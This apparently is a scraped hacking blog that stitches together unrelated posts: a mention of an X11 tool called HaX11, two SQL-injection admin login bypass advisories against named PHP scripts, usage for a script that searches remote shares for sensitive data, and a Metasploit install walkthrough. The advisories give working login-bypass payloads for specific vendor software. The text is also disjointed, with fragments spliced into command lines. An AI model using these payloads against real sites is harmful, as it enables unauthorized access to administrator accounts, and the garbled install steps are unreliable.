Get HaX11 @ GitHub
I decided not to share the slides so fuck you for not going to BSides STL :p
Basic usage is "#python hax11.py tar.get.ip.here"
Needs xdotool to work on kali systems.
More on HaX11 usage to come...
"Lets break it!"
All info in this blog is for educational use only!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[x] Type: Admin login bypass via SQLi[x] Vendor: http://software.friendsinwar.com/[x] Script Name: Make or Break[x] Script Version: 1.7[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9[x] Author: AnarchyAngel AKA Adam[x] Mail: anarchy[dot]ang31@gmail[dot]com[x] More info: https://aahideaway.blogspot.com/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to scripts admin login page and submit admin' or ''='-- for username
# aahideaway.blogspot.com #root@system:~/sec# ./bq.sh######################## [B]ooty [Q]uest ## By Adam Espitia #
# Arr, matey, ## where be me booty! ########################This script will mount/download contact from a remote host and search it for sensitive information.Usage here./bq.sh nfs 192.168.1.1 /share/here/./bq.sh smb 192.168.1.1 /share/here/./bq.sh ftp 192.168.1.1./bq.sh http 192.168.1.1 /dir/path/./bq.sh local /dir/path/
apt-get install default-jre default-jdk software-properties-commondatebase.yml contents
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main"
apt-get update
apt-get install oracle-java8-installer
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/scripts/rvm
echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rvm install $RUBYVERSION
rvm use $RUBYVERSION --default
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
mkdir ~/dev
cd ~/dev
git clone https://github.com/nmap/nmap.git
./configure
make
make install
make clean
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
psql -c "ALTER USER msf WITH ENCRYPTED PASSWORD 'blah';"
exit
cd /opt/
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
rvm --default use ruby-${RUBYVERSION}@metasploit-framework
gem install bundler
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml
production:More cmds...
adapter: postgresql
database: msf
username: msf
password: blah
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
msfconsole...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[x] Type: Admin login bypass via SQLi[x] Vendor: http://software.friendsinwar.com/[x] Script Name: My Click Counter[x] Script Version: 1.0[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15[x] Author: AnarchyAngel AKA Adam[x] Mail : anarchy[dot]ang31@gmail[dot]com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to scripts admin login page and submit ' or ''=' for username and password Labels: LHFI